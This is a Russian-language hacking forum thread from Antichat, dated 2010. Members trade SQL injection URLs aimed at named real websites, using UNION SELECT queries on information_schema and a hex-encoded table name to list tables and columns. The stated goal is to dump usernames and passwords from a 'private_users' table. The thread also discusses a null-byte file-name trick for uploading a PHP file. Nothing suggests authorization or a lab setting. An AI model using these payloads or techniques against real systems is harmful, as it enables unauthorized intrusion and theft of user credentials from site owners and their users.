Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
04.03.2010, 18:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от warlok
мож кто попробует вывести или еще что ?
http://ukr-link.com/index.php?idd=search&stext=auto')union(select'1',2 ,table_name,(4)from(information_schema.tables))%23
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
04.03.2010, 18:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от j0ker13
как обойти такую конструкцию?)
на $row['ID'] могу влиять)
сделал $row['ID'] = "1.php%00" получил:
Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
создать фаил прав не хватает или что то другое?
Насколько я понял, ты $row['id'] устанавливаешь методом POST, где данные передаются "как есть", т.е. не url-encoded символы не превращаются в обычные. Попробуй обратится GET'ом, или COOKIE. Если запрос в БД идет через глобальный массив _REQUEST, то должно сработать.
|
|
|
|
04.03.2010, 18:33
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008
Репутация:
58
|
|
$row['id'] берется из базы.
пробовал обычную картинку - тот же еррор.
видимо файлы новые создать нельзя. а существующие он заменяет(
|
|
|
|
04.03.2010, 19:47
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Strilo4ka, нулл-байт ты не скопируешь в буфер никак!
|
|
|
|
04.03.2010, 22:10
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
http://www.linumechilinum.am/?include=static2&page_id=49+union+select+0
ne kak ne polucaetsya..
|
|
|
|
05.03.2010, 00:36
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833
Репутация:
0
|
|
v1d0qz, спасибо за ссылку, но мне это не помогло =(
Вот я делаю запрос:
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.columns+where+table_name=%27private_users%27--
У меня кроме ошибок снизу (а они всегда были) ничего не выводится, хотя должно выводиться. Или я чтото не правильно делаю? |
|
|
|
05.03.2010, 00:43
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Код:
http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x707269766174655f7573657273
Хексим название таблицы и берем названия КОЛОНОК из таблицы с колонками, а не таблиц, ты их уже получил |
|
|
|
05.03.2010, 01:02
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833
Репутация:
0
|
|
wildshaman, спасбо, теперь я понял, но вот еще один последний вопрос. Когда я даю запрос, которые есть выше, то на экран выводит user_username и user_password. Как дальше из этих колонок вывести их значения (на данный момент пасс и логин)?
|
|
|
|
05.03.2010, 01:41
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
http://www.sixls.com/news.php?id=-3+union+select+1,count(*),3+from+private_users--+
0
|
|
|
|
05.03.2010, 02:07
|
|
Новичок
Регистрация: 03.03.2010
Сообщений: 9
Провел на форуме:
29833
Репутация:
0
|
|
Jokester, вывело только 0 и больше ничего =(
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
